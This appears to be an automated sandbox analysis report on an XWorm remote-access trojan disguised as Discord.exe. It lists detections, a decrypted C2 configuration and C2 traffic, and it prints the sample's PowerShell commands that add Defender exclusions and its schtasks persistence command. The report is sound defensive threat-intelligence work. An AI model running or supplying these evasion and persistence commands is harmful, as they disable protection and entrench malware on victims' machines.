Windows Analysis Report
s3OBQLA3xR.exe

Overview

General Information

Sample name: s3OBQLA3xR.exe
renamed because original name is a hash value
Original sample name: 2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706.exe
Analysis ID: 1532616
MD5: 8090c678b1ab88d330d94a8012682263
SHA1: 062e28c4a590a278ceff6a3931498d53db6812ec
SHA256: 2b2a240fbda2933b546a6d1b495d21878b9bf67da1c7e5b4cad29c8b82c5d706
Tags: exeuser-Chainskilabs
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: s3OBQLA3xR.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\Discord.exe Avira: detection malicious, Label: TR/Spy.Gen
Source: s3OBQLA3xR.exe Malware Configuration Extractor: Xworm {"C2 url": ["methods-availability.gl.at.ply.gg"], "Port": "20557", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\AppData\Roaming\Discord.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Discord.exe Virustotal: Detection: 65% Perma Link
Source: s3OBQLA3xR.exe ReversingLabs: Detection: 76%
Source: s3OBQLA3xR.exe Virustotal: Detection: 65% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Discord.exe Joe Sandbox ML: detected
Source: s3OBQLA3xR.exe Joe Sandbox ML: detected
Source: s3OBQLA3xR.exe String decryptor: methods-availability.gl.at.ply.gg
Source: s3OBQLA3xR.exe String decryptor: 20557
Source: s3OBQLA3xR.exe String decryptor: <123456789>
Source: s3OBQLA3xR.exe String decryptor: <Xwormmm>
Source: s3OBQLA3xR.exe String decryptor: XWorm V5.2
Source: s3OBQLA3xR.exe String decryptor: USB.exe
Source: s3OBQLA3xR.exe String decryptor: %AppData%
Source: s3OBQLA3xR.exe String decryptor: Discord.exe
Source: s3OBQLA3xR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: s3OBQLA3xR.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

barindex
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.23:20557 -> 192.168.2.4:49739
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.23:20557 -> 192.168.2.4:49739
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49739 -> 147.185.221.23:20557
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49739 -> 147.185.221.23:20557
Source: Malware configuration extractor URLs: methods-availability.gl.at.ply.gg
Source: Yara match File source: s3OBQLA3xR.exe, type: SAMPLE
Source: Yara match File source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED
Source: global traffic TCP traffic: 192.168.2.4:49739 -> 147.185.221.23:20557
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 147.185.221.23 147.185.221.23
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View ASN Name: SALSGIVERUS SALSGIVERUS
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: methods-availability.gl.at.ply.gg
Source: powershell.exe, 00000001.00000002.1792186081.00000239CFA10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsK_o
Source: powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microso?
Source: powershell.exe, 00000004.00000002.1877930359.000001ADB22E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoo
Source: s3OBQLA3xR.exe, Discord.exe.0.dr String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: s3OBQLA3xR.exe, 00000000.00000002.2966183851.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1766087505.00000239B75A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2A98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1766087505.00000239B7381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1817235874.000001AD99C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1909041737.0000021BD2871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2063422402.0000022956EC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2063422402.00000229570E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1784597274.00000239C73F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1862924961.000001ADA9CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2003513944.0000021BE28E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2182894450.0000022966F32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

barindex
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: s3OBQLA3xR.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Code function: 0_2_00007FFD9B7E2361 0_2_00007FFD9B7E2361
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Code function: 0_2_00007FFD9B7E16E9 0_2_00007FFD9B7E16E9
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Code function: 0_2_00007FFD9B7E6E42 0_2_00007FFD9B7E6E42
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Code function: 0_2_00007FFD9B7E6096 0_2_00007FFD9B7E6096
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Code function: 0_2_00007FFD9B7EA918 0_2_00007FFD9B7EA918
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Code function: 0_2_00007FFD9B7E20C1 0_2_00007FFD9B7E20C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 15_2_00007FFD9B7D16E9 15_2_00007FFD9B7D16E9
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 15_2_00007FFD9B7D0E5E 15_2_00007FFD9B7D0E5E
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 15_2_00007FFD9B7D20C1 15_2_00007FFD9B7D20C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 16_2_00007FFD9B7C16E9 16_2_00007FFD9B7C16E9
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 16_2_00007FFD9B7C0E5E 16_2_00007FFD9B7C0E5E
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 16_2_00007FFD9B7C20C1 16_2_00007FFD9B7C20C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 17_2_00007FFD9B8016E9 17_2_00007FFD9B8016E9
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 17_2_00007FFD9B800E5E 17_2_00007FFD9B800E5E
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 17_2_00007FFD9B8020C1 17_2_00007FFD9B8020C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 18_2_00007FFD9B7D16E9 18_2_00007FFD9B7D16E9
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 18_2_00007FFD9B7D0E5E 18_2_00007FFD9B7D0E5E
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 18_2_00007FFD9B7D20C1 18_2_00007FFD9B7D20C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 20_2_00007FFD9B7E16E9 20_2_00007FFD9B7E16E9
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 20_2_00007FFD9B7E0E5E 20_2_00007FFD9B7E0E5E
Source: s3OBQLA3xR.exe, 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
Source: s3OBQLA3xR.exe, 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
Source: s3OBQLA3xR.exe Binary or memory string: OriginalFilenamediscord.exe0 vs s3OBQLA3xR.exe
Source: s3OBQLA3xR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: s3OBQLA3xR.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.s3OBQLA3xR.exe.860000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2995661677.0000000012BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Discord.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: s3OBQLA3xR.exe, sobWCqEaS5.cs Cryptographic APIs: 'TransformFinalBlock'
Source: s3OBQLA3xR.exe, U9pHMOisPp.cs Cryptographic APIs: 'TransformFinalBlock'
Source: s3OBQLA3xR.exe, U9pHMOisPp.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Discord.exe.0.dr, sobWCqEaS5.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Discord.exe.0.dr, U9pHMOisPp.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Discord.exe.0.dr, U9pHMOisPp.cs Cryptographic APIs: 'TransformFinalBlock'
Source: s3OBQLA3xR.exe, 1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.cs Base64 encoded string: 'N+J/cgk6Ux7/+LR5tyAA4QxisYq+V+KiybXR0C8o1/0ijtAO697n9uiUUeBx/JEW'
Source: Discord.exe.0.dr, 1NHy9KwsxC1RYta4aWCRc5zXrDv2qZwmjq6tftd6nKrjzYO7kyxxSS7xLoL3zHFWCrNIaCWvZjhkuSApcY0.cs Base64 encoded string: 'N+J/cgk6Ux7/+LR5tyAA4QxisYq+V+KiybXR0C8o1/0ijtAO697n9uiUUeBx/JEW'
Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@21/21@2/2
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File created: C:\Users\user\AppData\Roaming\Discord.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Discord.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Mutant created: \Sessions\1\BaseNamedObjects\miQ2yTLyupQ9Eve0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File created: C:\Users\user\AppData\Local\Temp\Log.tmp Jump to behavior
Source: s3OBQLA3xR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: s3OBQLA3xR.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: s3OBQLA3xR.exe ReversingLabs: Detection: 76%
Source: s3OBQLA3xR.exe Virustotal: Detection: 65%
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File read: C:\Users\user\Desktop\s3OBQLA3xR.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\s3OBQLA3xR.exe "C:\Users\user\Desktop\s3OBQLA3xR.exe"
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Discord.exe "C:\Users\user\AppData\Roaming\Discord.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Discord.exe "C:\Users\user\AppData\Roaming\Discord.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Discord.exe C:\Users\user\AppData\Roaming\Discord.exe
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe' Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe" Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Section loaded: msvfw32.dll Jump to behavior
